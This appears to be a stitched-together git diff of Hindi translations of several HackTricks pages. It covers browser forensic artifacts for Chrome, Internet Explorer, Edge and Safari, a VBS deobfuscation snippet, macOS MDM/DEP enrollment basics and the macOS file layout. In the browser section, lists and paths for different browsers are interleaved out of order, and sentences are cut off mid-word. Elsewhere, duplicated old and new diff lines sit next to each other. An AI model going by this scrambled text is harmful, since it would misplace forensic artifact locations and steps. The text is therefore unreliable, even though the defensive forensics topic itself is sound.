- **Browsers built-in anti-phishing**: जांचने के लिए कि क्या एंटी-फिशिंग और मैलवेयर सुरक्षा सक्षम हैं, `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences` चलाएं। आउटपुट में `{"enabled: true,"}` खोजें।
## **SQLite DB डेटा रिकवरी**
जैसा कि आप पिछले खंडों में देख सकते हैं, च्रोम और फ़ायरफ़ॉक्स डेटा संग्रहित करने के लिए **SQLite** डेटाबेस का उपयोग करते हैं। इस उपकरण का उपयोग करके **sqlparse**](https://github.com/padfoot999/sqlparse) **या** [**sqlparse\_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases) से हटाए गए एंट्री को बहाल किया जा सकता है।
## **Internet Explorer 11**
इंटरनेट एक्सप्लोरर **डेटा** और **मेटाडेटा** विभिन्न स्थानों में संग्रहित करता है। मेटाडेटा डेटा खोजने में मदद करेगा।
इंटरनेट एक्सप्लोरर 11 अपने डेटा और मेटाडेटा को विभिन्न स्थानों पर प्रबंधित करता है, जो संग्रहित जानकारी और उसके संबंधित विवरणों को आसान पहुंच और प्रबंधन के लिए सहायक होता है
मेटाडेटा फ़ोल्डर में मिल सकता है `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` जहाँ VX V01, V16, या V24 हो सकता है।\
पिछले फ़ोल्डर में, आप फ़ाइल V01.log भी पा सकते हैं। यदि इस फ़ाइल की **संशोधित समय** और WebcacheVX.data फ़ाइल का **अलग है** तो आपको संभावित **असंगतताओं** को ठीक करने के लिए आदेश `esentutl /r V01 /d` चलाने की आवश्यकता हो सकती है।
### मेटाडेटा संग्रहण
इंटरनेट एक्सप्लोरर के लिए मेटाडेटा `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` में संग्रहित होता है (VX V01, V16, या V24 होता है)। इसके साथ, `V01.log` फ़ाइल `WebcacheVX.data` के साथ संशोधन समय विसंगतियों को दिखा सकती है, जिससे `esentutl /r V01 /d` का उपयोग करके मरम्मत की आवश्यकता हो सकती है। इस मेटाडेटा, जो एक ईएसई डेटाबेस में संग्रहित है, को उपकरणों जैसे photorec और [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) का उपयोग करके पुनर्प्राप्त और जांचा जा सकता है। **Containers** तालिका में, प्रत्येक डेटा सेगमेंट को संग्रहित करने वाले विशिष्ट तालिकाएँ या कंटेनर्स को अलग किया जा सकता है, जिसमें स्काइप जैसे अन्य माइक्रोसॉफ्ट उपकरणों के लिए कैश विवरण शामिल हैं।
एक बार इस आर्टिफैक्ट को पुनः प्राप्त किया गया है (यह एक ESE डेटाबेस है, photorec इसे विनिमय डेटाबेस या EDB विकल्प के साथ पुनर्प्राप्त कर सकता है) तो आप इसे खोलने के लिए प्रोग्राम [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) का उपयोग कर सकते हैं। एक बार **खोलने** के बाद, जाएं तालिका नामित "**Containers**".
### कैश जांच
[IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) उपकरण कैश जांच के लिए अनुमति देता है, जिसमें कैश डेटा निकालने वाले फ़ोल्डर का स्थान होता है। कैश के लिए मेटाडेटा में फ़ाइल नाम, निर्देशिका, एक्सेस गिनती, URL मूल, और कैश निर्माण, एक्सेस, संशोधन, और समाप्ति समय की टाइमस्टैम्प शामिल हैं।
![](<../../../.gitbook/assets/image (446).png>)
### कुकीज़ प्रबंधन
कुकीज़ [IECookiesView](https://www.nirsoft.net/utils/iecookies.html) का उपयोग करके जांची जा सकती है, जिसमें मेटाडेटा नाम, URL, एक्सेस गिनती, और विभिन्न समय संबंधित विवरण शामिल हैं। स्थायी कुकीज़ `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies` में संग्रहित होती हैं, जबकि सत्र कुकीज़ मेमोरी में रहती हैं।
इस तालिका के अंदर, आप प्राप्त सूचना के प्रत्येक हिस्से को किस अन्य तालिकाओं या कंटेनर में सहेजा गया है, वहाँ से आप ब्राउज़र्स द्वारा संग्रहित डेटा की **स्थान** और उसमें मौजूद **मेटाडेटा** पा सकते हैं।
### डाउनलोड विवरण
डाउनलोड मेटाडेटा [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) के माध्यम से उपलब्ध है, जिसमें विशिष्ट कंटेनर्स डेटा जैसे URL, फ़ाइल प्रकार, और डाउनलोड स्थान को संग्रहित करते हैं। भौतिक फ़ाइलें `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory` के तहत पाई जा सकती हैं।
**ध्यान दें कि यह तालिका अन्य माइक्रोसॉफ्ट उपकरणों के लिए भी कैश की मेटाडेटा को दर्शाता है (जैसे skype)**
### ब्राउज़िंग इतिहास
ब्राउज़िंग इतिहास की समीक्षा करने के लिए, [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) का उपयोग किया जा सकता है, जिसमें निकाले गए इतिहास फ़ाइलों के स्थान और इंटरनेट एक्सप्लोरर के लिए विन्यास की आवश्यकता होती है। यहाँ मेटाडेटा में संशोधन और एक्सेस समय के साथ एक्सेस गिनती शामिल है। इतिहास फ़ाइलें `%userprofile%\Appdata\Local\Microsoft\Windows\History` में स्थित हैं।
### कैश
### टाइप किए गए URL
टाइप किए गए URL और उनके उपयोग समय रजिस्ट्री के अंदर `NTUSER.DAT` में `Software\Microsoft\InternetExplorer\TypedURLs` और `Software\Microsoft\InternetExplorer\TypedURLsTime` के तहत संग्रहीत होते हैं, जो उपयोगकर्ता द्वारा दर्ज किए गए अंतिम 50 URL और उनके अंतिम इनपुट समय का ट्रैकिंग करते हैं।
आप टूल [IECacheView](https://www.nirsoft.net/utils/ie\_cache\_viewer.html) का उपयोग कैश की जांच करने के लिए कर सकते हैं। आपको उस फ़ोल्डर की स्थान दर्शाना होगा जहाँ आपने कैश डेटा निकाला है।
#### मेटाडेटा
## Microsoft Edge
कैश के बारे में मेटाडेटा जानकारी सहेजता है:
Microsoft Edge उपयोगकर्ता डेटा को `%userprofile%\Appdata\Local\Packages` में संग्रहित करता है। विभिन्न डेटा प्रकारों के लिए मार्ग हैं:
* डिस्क में फ़ाइल का नाम
* SecureDIrectory: कैश निर्देशिकाओं के अंदर फ़ाइल का स्थान
* AccessCount: कितनी बार यह कैश में सहेजा गया था
* URL: यूआरएल मूल
* CreationTime: पहली बार जब यह कैश किया गया था
* AccessedTime: कैश का उपयोग किया गया समय
* ModifiedTime: अंतिम वेबपेज संस्करण
* ExpiryTime: कैश का समय जब समाप्त होगा
- **प्रोफ़ाइल पथ**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC`
- **इतिहास, कुकीज़, और डाउनलोड**: `C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat`
- **सेटिंग्स, बुकमार्क्स, और पढ़ने की सूची**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb`
- **कैश**: `C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC#!XXX\MicrosoftEdge\Cache`
- **अंतिम सक्रिय सत्र**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active`
#### फ़ाइलें
## Safari
कैश जानकारी _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5**_ और _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\low**_ में पाई जा सकती है।
Safari डेटा `/Users/$User/Library/Safari` में संग्रहित होता है। मुख्य फ़ाइलें शामिल हैं:
इन फ़ोल्डरों के अंदर की जानकारी उपयोगकर्ता द्वारा देखा जा रहा था। कैश का आकार **250 MB** होता है और टाइमस्टैम्प दिखाता है कि पृष्ठ कब देखा गया था (पहली बार, NTFS के निर्माण तिथि, अंतिम समय, NTFS के संशोधन समय)।
### कुकीज़
आप टूल [IECookiesView](https://www.nirsoft.net/utils/iecookies.html) का उपयोग कुकीज़ की जांच करने के लिए कर सकते हैं। आपको उस फ़ोल्डर की स्थान दर्शाना होगा जहाँ आपने कुकीज़ निकाली हैं।
#### **मेटाडेटा**
कुकीज़ के बारे में मेटाडेटा जानकारी सहेजता है:
* फ़ाइल सिस्टम में कुकीज़ का नाम
* URL
* AccessCount: कितनी बार कुकीज़ सर्वर को भेजी गई है
* CreationTime: पहली बार कुकीज़ बनाई गई थी
* ModifiedTime: अंतिम बार कुकीज़ को संशोधित किया गया था
* AccessedTime: कुकीज़ को अंतिम बार एक्सेस किया गया था
* ExpiryTime: कुकीज़ की समाप्ति का समय
#### फ़ाइलें
कुकीज़ डेटा _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies**_ और _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies\low**_ में पाई जा सकती है।
सत्र कुकीज़ मेमोरी में रहेंगी और स्थायी कुकी डिस्क में।
### डाउनलोड
#### **मेटाडेटा**
उपकरण [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) की ज
- **History.db**: URL और यात्रा समय चिह्नित करने वाले `history_vis

View file

@ -8,27 +8,27 @@
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>
कुछ ऐसी चीजें जो एक दुष्ट VBS फ़ाइल को डीबग/डीओबफस्केट करने में उपयोगी हो सकती हैं:
कुछ ऐसी चीजें जो एक दुष्ट VBS फ़ाइल को डीबग/डीओबफस्केट करने में उपयोगी हो सकती हैं:
## echo
```bash
Wscript.Echo "Like this?"
```
## टिप्पणियाँ
```text
```bas
' this is a comment
```
## परीक्षण
```text
```bas
cscript.exe file.vbs
```
## फ़ाइल में डेटा लिखें
```aspnet
```js
Function writeBinary(strBinary, strPath)
Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")

View file

@ -2,66 +2,75 @@
<details>
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert) के साथ</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके
* यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मेरा** ट्विटर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** का** **पालन** करें।
* **HackTricks** (https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PR जमा करके अपने हैकिंग ट्रिक्स साझा करें
</details>
## मूल बातें
**macOS MDM के बारे में जानने के लिए:**
### MDM (Mobile Device Management) क्या है?
* [https://www.youtube.com/watch?v=ku8jZe-MHUU](https://www.youtube.com/watch?v=ku8jZe-MHUU)
* [https://duo.com/labs/research/mdm-me-maybe](https://duo.com/labs/research/mdm-me-maybe)
[Mobile Device Management](https://en.wikipedia.org/wiki/Mobile\_device\_management) (MDM) एक प्रौद्योगिकी है जो आमतौर पर मोबाइल फोन, लैपटॉप, डेस्कटॉप और टैबलेट जैसे अंतिम-उपयोगकर्ता कंप्यूटिंग उपकरणों को **प्रशासित करने** के लिए उपयोग की जाती है। iOS, macOS और tvOS जैसे Apple प्लेटफॉर्म के मामले में, यह उन विशेषताओं, APIs और तकनीकों का उल्लेख करता है जिनका उपयोग प्रशासक इन उपकरणों को प्रबंधित करने के लिए करते हैं। उपकरणों का प्रबंधन MDM के माध्यम से एक संगत वाणिज्यिक या ओपन-सोर्स MDM सर्वर की आवश्यकता होती है जो [MDM Protocol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf) के लिए समर्थन को लागू करता है।
## मूलभूत
* **केंद्रीकृत उपकरण प्रबंधन** प्राप्त करने का एक तरीका
* **MDM सर्वर** की आवश्यकता होती है जो MDM प्रोटोकॉल के लिए समर्थन को लागू करता है
* MDM सर्वर **MDM आदेश भेज सकता है**, जैसे कि दूरस्थ पोंछ या "इस कॉन्फ़िग को स्थापित करें"
### **MDM (मोबाइल डिवाइस प्रबंधन) अवलोकन**
[मोबाइल डिवाइस प्रबंधन](https://en.wikipedia.org/wiki/Mobile_device_management) (MDM) का उपयोग स्मार्टफोन, लैपटॉप और टैबलेट जैसे विभिन्न अंतयज उपकरणों का प्रबंधन करने के लिए किया जाता है। विशेष रूप से Apple के प्लेटफॉर्मों (iOS, macOS, tvOS) के लिए, इसमें विशेषताएँ, एपीआई और अभ्यास शामिल हैं। MDM का संचालन एक संगत MDM सर्वर पर निर्भर करता है, जो व्यापार में उपलब्ध या ओपन-सोर्स हो सकता है, और [MDM Protocol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf) का समर्थन करना चाहिए। मुख्य बिंदुओं में शामिल हैं:
### मूल बातें DEP (Device Enrolment Program) क्या है?
- उपकरणों पर केंद्रीकृत नियंत्रण।
- MDM प्रोटोकॉल का पालन करने वाले MDM सर्वर पर निर्भरता।
- MDM सर्वर की क्षमता विभिन्न कमांडों को उपकरणों में भेजने के लिए, उदाहरण के लिए, दूरस्थ डेटा मिटाना या विन्यास स्थापना।
[Device Enrollment Program](https://www.apple.com/business/site/docs/DEP\_Guide.pdf) (DEP) Apple द्वारा प्रदान की गई एक सेवा है जो iOS, macOS, और tvOS उपकरणों के **शून्य-स्पर्श विन्यास** की पेशकश करके Mobile Device Management (MDM) **नामांकन** को **सरलीकृत** करती है। अधिक पारंपरिक तैनाती विधियों के विपरीत, जिनके लिए अंतिम-उपयोगकर्ता या प्रशासक को एक उपकरण को कॉन्फ़िगर करने के लिए कार्रवाई करनी पड़ती है, या मैन्युअल रूप से एक MDM सर्वर के साथ नामांकन करना पड़ता है, DEP इस प्रक्रिया को बूटस्ट्रैप करने का लक्ष्य रखता है, **उपयोगकर्ता को एक नए Apple उपकरण को अनबॉक्स करने और इसे संगठन में उपयोग के लिए लगभग तुरंत कॉन्फ़िगर किया जा सकता है**
### **DEP (डिवाइस एनरोलमेंट प्रोग्राम) की मूलभूत जानकारी**
Apple द्वारा प्रदान किया गया [डिवाइस एनरोलमेंट प्रोग्राम](https://www.apple.com/business/site/docs/DEP_Guide.pdf) (DEP) iOS, macOS और tvOS उपकरणों के लिए जीर्ण-स्पर्श विन्यास को सुगम बनाता है, जिससे MDM का सम्मिलन सुविधाजनक होता है। DEP एनरोलमेंट प्रक्रिया को स्वचालित करता है, जिससे उपकरणों को बॉक्स से निकालते ही संचालनिक रूप से सक्रिय किया जा सकता है, न्यूनतम उपयोगकर्ता या प्रशासनिक हस्तक्षेप के साथ। महत्वपूर्ण पहलू शामिल हैं:
प्रशासक DEP का उपयोग अपने संगठन के MDM सर्वर में उपकरणों को स्वचालित रूप से नामांकित करने के लिए कर सकते हैं। एक बार उपकरण नामांकित हो जाने के बाद, **कई मामलों में इसे संगठन द्वारा स्वामित्व वाले "विश्वसनीय"** उपकरण के रूप में माना जाता है, और यह कई प्रमाणपत्र, अनुप्रयोग, वाईफाई पासवर्ड, VPN कॉन्फ़िगरेशन [और इसी तरह](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf) प्राप्त कर सकता है।
- उपकरणों को प्रारंभिक सक्रियण के बाद पूर्व-निर्धारित MDM सर्वर के साथ स्वत: पंजीकरण करने की संभावना।
- मुख्य रूप से नए उपकरणों के लिए उपयोगी है, लेकिन पुनर्विन्यास के अवसरों के लिए भी लागू है।
- एक सरल सेटअप को सुविधाजनक बनाता है, जिससे उपकरण त्वरित रूप से संगठनात्मक उपयोग के लिए तैयार हो जाते हैं।
* उपकरण को पहली बार चालू करने पर पूर्व-कॉन्फ़िगर किए गए MDM सर्वर में स्वचालित रूप से नामांकित करने की अनुमति देता है
* सबसे उपयोगी जब **उपकरण** **बिल्कुल नया** हो
* **पुनः प्रावधान** कार्यप्रवाहों के लिए भी उपयोगी हो सकता है (**ताजा OS स्थापना के साथ** **पोंछा** गया)
### **सुरक्षा विचार**
DEP द्वारा प्रदान की गई पंजीकरण की सरलता का ध्यान रखना महत्वपूर्ण है, जो लाभकारी होने के साथ-साथ सुरक्षा जोखिम भी उठा सकती है। यदि MDM पंजीकरण के लिए उचित संरक्षण उपयुक्त रूप से प्रयोग नहीं किए जाते हैं, तो हमलावर इस सुविधाजनक प्रक्रिया का उपयोग करके अपने उपकरण को संगठन के MDM सर्वर पर पंजीकृत कर सकते हैं, कॉर्पोरेट उपकरण के रूप में बनामास्कार करते हुए।
{% hint style="danger" %}
दुर्भाग्यवश, यदि किसी संगठन ने अपने MDM नामांकन की **सुरक्षा के लिए अतिरिक्त कदम नहीं उठाए हैं**, तो DEP के माध्यम से एक सरलीकृत अंतिम-उपयोगकर्ता नामांकन प्रक्रिया का मतलब यह भी हो सकता है कि **हमलावरों के लिए संगठन के MDM** सर्वर में एक उपकरण को नामांकित करने की प्रक्रिया सरल हो जाए, एक कॉर्पोरेट उपकरण की "पहचान" का दावा करते हुए
**सुरक्षा चेतावनी**: सरल DEP पंजीकरण के माध्यम से अनधिकृत उपकरण पंजीकरण को संगठन के MDM सर्वर पर पंजीकृत करने की संभावना है यदि उचित सुरक्षा उपाय स्थापित नहीं किए गए हों
{% endhint %}
### मूल बातें SCEP (Simple Certificate Enrolment Protocol) क्या है?
### Basics What is SCEP (Simple Certificate Enrolment Protocol)?
* एक अपेक्षाकृत पुराना प्रोटोकॉल, TLS और HTTPS व्यापक रूप से प्रचलित होने से पहले बनाया गया।
* ग्राहकों को एक प्रमाणपत्र प्राप्त करने के उद्देश्य से एक **Certificate Signing Request** (CSR) भेजने का एक मानकीकृत तरीका देता है। ग्राहक सर्वर से उसे एक हस्ताक्षरित प्रमाणपत्र देने के लिए कहेगा।
* एक उत्कृष्ट प्रोटोकॉल, TLS और HTTPS के फैलने से पहले बनाया गया।
* ग्राहकों को प्रमाणपत्र प्राप्त करने के लिए **सरल प्रमाणपत्र पंजीकरण अनुप्रोटोल** (CSR) भेजने का एक मानकीकृत तरीका। ग्राहक सर्वर से एक साइन किया गया प्रमाणपत्र प्राप्त करने के लिए सर्वर से कहेगा।
### कॉन्फ़िगरेशन प्रोफाइल (उर्फ mobileconfigs) क्या हैं?
### What are Configuration Profiles (aka mobileconfigs)?
* Apple का आधिकारिक तरीका **सिस्टम कॉन्फ़िगरेशन सेटिंग/प्रवर्तन करने का।**
* फ़ाइल प्रारूप जो कई पेलोड्स को समाहित कर सकता है
* प्रॉपर्टी लिस्ट्स (XML प्रकार) पर आधारित
* “हस्ताक्षरित और एन्क्रिप्टेड किया जा सकता है उनके मूल, अखंडता को मान्य करने और उनकी सामग्री की सुरक्षा के लिए।” मूल बातें — पृष्ठ 70, iOS सुरक्षा गाइड, जनवरी 2018।
* Apple का आधिकारिक तरीका **सिस्टम विन्यास सेट/निषेधन** करने का।
* फाइल प्रारूप जिसमें कई payloads हो सकते हैं
* संपत्ति सूचियों पर आधारित (एक्सएमएल प्रकार का)
* "उनकी मूल की पुष्टि करने, उनकी पूर्णता सुनिश्चित करने और उनकी सामग्री की सुरक्षा करने के लिए साइन और एन्क्रिप्ट किया जा सकता है।" मूलभूत — पृष्ठ 70, iOS सुरक्षा गाइड, जनवरी 2018।
## प्रोटोकॉल
## Protocols
### MDM
* APNs (**Apple सर्वर**s) + RESTful API (**MDM** **विक्रेता** सर्वर) का संयोजन
* **संचार** एक **उपकरण** और एक सर्वर के बीच होता है जो एक **उपकरण** **प्रबंधन** **उत्पाद** से जुड़ा होता है
* **आदेश** MDM से उपकरण में **plist-encoded शब्दकोशों** में वितरित किए जाते है
* सभी **HTTPS** के ऊपर। MDM सर्वर हो सकते हैं (और आमतौर पर होते हैं) पिन किए गए
* APNs (**Apple server**s) + RESTful API (**MDM** **vendor** servers) का संयोजन
* **संचार** एक **उपकरण** और एक **उपकरण प्रबंधन** **उत्पाद** से संबंधित सर्वर के बीच होता है
* **कमांड** MDM से उपकरण में पहुंचाए जाते हैं **plist-encoded dictionaries** मे
* सभी **HTTPS** के माध्यम से। MDM सर्वरों को (और आम तौर पर) पिन किया जा सकता है
* Apple MDM विक्रेता को प्रमाणीकरण के लिए एक **APNs प्रमाणपत्र** प्रदान करता है
### DEP
* **3 APIs**: 1 रिसेलर्स के लिए, 1 MDM विक्रेताओं के लिए, 1 उपकरण पहचान के लिए (अप्रलेखित):
* तथाकथित [DEP "क्लाउड सेवा" API](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf)। इसका उपयोग MDM सर्वर द्वारा विशिष्ट उपकरणों के साथ DEP प्रोफाइलों को जोड़ने के लिए किया जाता है।
* [DEP API जिसका उपयोग Apple Authorized Resellers](https://applecareconnect.apple.com/api-docs/depuat/html/WSImpManual.html) द्वारा उपकरणों को नामांकित करने, नामांकन स्थिति की जांच करने और लेनदेन स्थिति की जांच करने के लिए किया ज
* **3 APIs**: 1 रिसेलरों के लिए, 1 MDM विक्रेताओं के लिए, 1 डिवाइस पहचान के लिए (अनसंदर्भित):
* उसे [DEP "बादल सेवा" API](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf) कहा जाता है। इसका उपयोग MDM सर्वरों द्वारा DEP प्रोफाइलों को विशिष्ट उपकरणों के साथ संबंधित करने के लिए किया जाता है।
* [एप्पल अधिकृत रिसेलरों द्वारा उपयोग किया जाने वाला DEP API](https://applecareconnect.apple.com/api-docs/depuat/html/WSImpManual.html) उपकरणों को नामांकित करने, नामांकन स्थिति की जांच करने और लेन-देन स्थिति की जांच करने के लिए।
* अनसंदर्भित निजी DEP API। इसका उपयोग एप्पल उपकरणों द्वारा उनके DEP प्रोफाइल का अनुरोध करने के लिए किया जाता है। macOS पर, `cloudconfigurationd` बाइनरी इस API के साथ संवाद करने के लिए जिम्मेदार है।
* अधिक आधुनिक और **JSON** आधारित (vs. plist)
* Apple MDM विक्रेता को एक **OAuth टोकन** प्रदान किया जाता है
**DEP "बाद

View file

@ -1,84 +1,83 @@
# macOS फाइल्स, फोल्डर्स, बाइनरीज़ और मेमोरी
# macOS फ़ाइलें, फ़ोल्डर, बाइनरी और मेमोरी
<details>
<summary><strong>शून्य से हीरो तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**.
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
* यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहत हैं तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मेरा** ट्विटर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** का पालन करें।**
* **HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PR जमा करके अपने हैकिंग ट्रिक्स साझा करें।
</details>
## फाइल हायरार्की लेआउट
## फ़ाइल व्यवस्था लेआउट
* **/Applications**: इंस्टॉल किए गए ऐप्स यहाँ होने चाहिए। सभी यूजर्स इन्हें एक्सेस कर सकेंगे।
* **/bin**: कमांड लाइन बाइनरीज़
* **/cores**: अगर मौजूद है, तो यह कोर डंप्स स्टोर करने के लिए इस्तेमाल होता है
* **/dev**: सब कुछ फाइल के रूप में माना जाता है इसलिए आपको हार्डवेयर डिवाइसेस यहाँ स्टोर होते दिख सकते हैं।
* **/etc**: कॉन्फ़िगरेशन फाइल्स
* **/Library**: यहाँ बहुत सारी सबडायरेक्टरीज़ और फाइल्स प्रेफरेंसेस, कैशेस और लॉग्स से संबंधित मिल सकती हैं। एक Library फोल्डर रूट में और प्रत्येक यूजर की डायरेक्टरी में मौजूद होता है।
* **/private**: अनडॉक्यूमेंटेड लेकिन बहुत सारे उल्लेखित फोल्डर्स प्राइवेट डायरेक्टरी के सिम्बॉलिक लिंक्स होते हैं।
* **/sbin**: एसेंशियल सिस्टम बाइनरीज़ (प्रशासन से संबंधित)
* **/System**: OS X को चलाने के लिए फाइल। यहाँ ज्यादातर केवल Apple विशिष्ट फाइल्स मिलनी चाहिए (तीसरे पक्ष की नहीं)।
* **/tmp**: फाइल्स 3 दिनों के बाद डिलीट हो जाती हैं (यह /private/tmp का सॉफ्ट लिंक है)
* **/Users**: यूजर्स के लिए होम डायरेक्टरी।
* **/usr**: कॉन्फ़िग और सिस्टम बाइनरीज़
* **/var**: लॉग फाइल्स
* **/Volumes**: माउंटेड ड्राइव्स यहाँ दिखाई देंगी।
* **/.vol**: `stat a.txt` चलाने पर आपको कुछ ऐसा मिलता है `16777223 7545753 -rw-r--r-- 1 username wheel ...`हाँ पहला नंबर उस वॉल्यूम का आईडी नंबर होता है जहाँ फाइल मौजूद है और दूसरा इनोड नंबर होता है। आप इस जानकारी के साथ /.vol/ के माध्यम से इस फाइल की सामग्री तक पहुँच सकते हैं `cat /.vol/16777223/7545753`
* **/Applications**: स्थापित ऐप्स यहाँ होने चाहिए। सभी उपयोगकर्ता उन्हें एक्सेस कर सकेंगे।
* **/bin**: कमांड लाइन बाइनरी
* **/cores**: अगर मौजूद है, तो यह कोर डंप स्टोर करने के लिए उपयोग किया जाता है
* **/dev**: सब कुछ एक फ़ाइल के रूप में देखा जाता है इसलिए आप हार्डवेयर डिवाइस यहाँ स्टोर किए गए देख सकते हैं।
* **/etc**: कॉन्फ़िगरेशन फ़ाइलें
* **/Library**: यहाँ प्राथमिकताएँ, कैश और लॉग्स से संबंधित कई उपनिर्देशिकाएँ और फ़ाइलें पाई जा सकती हैं। एक लाइब्रेरी फ़ोल्डर मूल और प्रत्येक उपयोगकर्ता के निर्देशिका में मौजूद है।
